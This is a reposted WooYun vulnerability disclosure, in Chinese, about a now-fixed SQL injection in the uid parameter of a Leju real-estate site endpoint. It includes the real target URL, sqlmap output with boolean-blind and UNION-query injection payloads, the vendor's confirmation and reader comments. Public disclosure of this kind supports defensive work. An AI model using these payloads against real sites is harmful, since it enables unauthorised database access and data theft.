新浪乐居某接口SQL注入

admin

141215
文章

117
评论

2017年4月20日17:13:12评论232 views字数 220阅读0分44秒阅读模式

摘要

2016-04-19：细节已通知厂商并且等待厂商处理中
2016-04-20：厂商已经确认，细节仅向厂商公开
2016-04-21：厂商已经修复漏洞并主动公开，细节向公众公开

漏洞概要关注数(10) 关注此漏洞

缺陷编号： WooYun-2016-198329

漏洞标题：新浪乐居某接口SQL注入

漏洞作者：染血の雪

提交时间： 2016-04-19 21:49

修复时间： 2016-04-21 09:30

公开时间： 2016-04-21 09:30

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：厂商已经修复

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

2016-04-19：细节已通知厂商并且等待厂商处理中
2016-04-20：厂商已经确认，细节仅向厂商公开
2016-04-21：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

我也来一发乐居

详细说明：

url：

code 区域

http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=8156628

uid处存在注入

payload：

code 区域

sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: #1* (URI)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=8156628 AND 7795=7795
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 14 columns
     Payload: http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=-7870 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a7a71,0x6f7144787564564c774166636561577a69695971786e6d547a735a78707451435079596e4f6b666f,0x717a6a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
 ---

漏洞证明：

21库

表好多

修复方案：

过虑

版权声明：转载请注明来源染血の雪@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-04-20 09:00

厂商回复：

谢谢你对乐居安全做出的贡献，我们会尽快修复这个漏洞

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

评价

2016-04-21 17:26 | godsec ( 普通白帽子 | Rank:255 漏洞数:40 | 不走小厂商,)

0

鲍总这么屌

1# 回复此人
2016-04-23 13:51 | havy ( 实习白帽子 | Rank:67 漏洞数:21 | 开开心心写代码)

0

已修复，请测试

2# 回复此人

漏洞概要 关注数(10) 关注此漏洞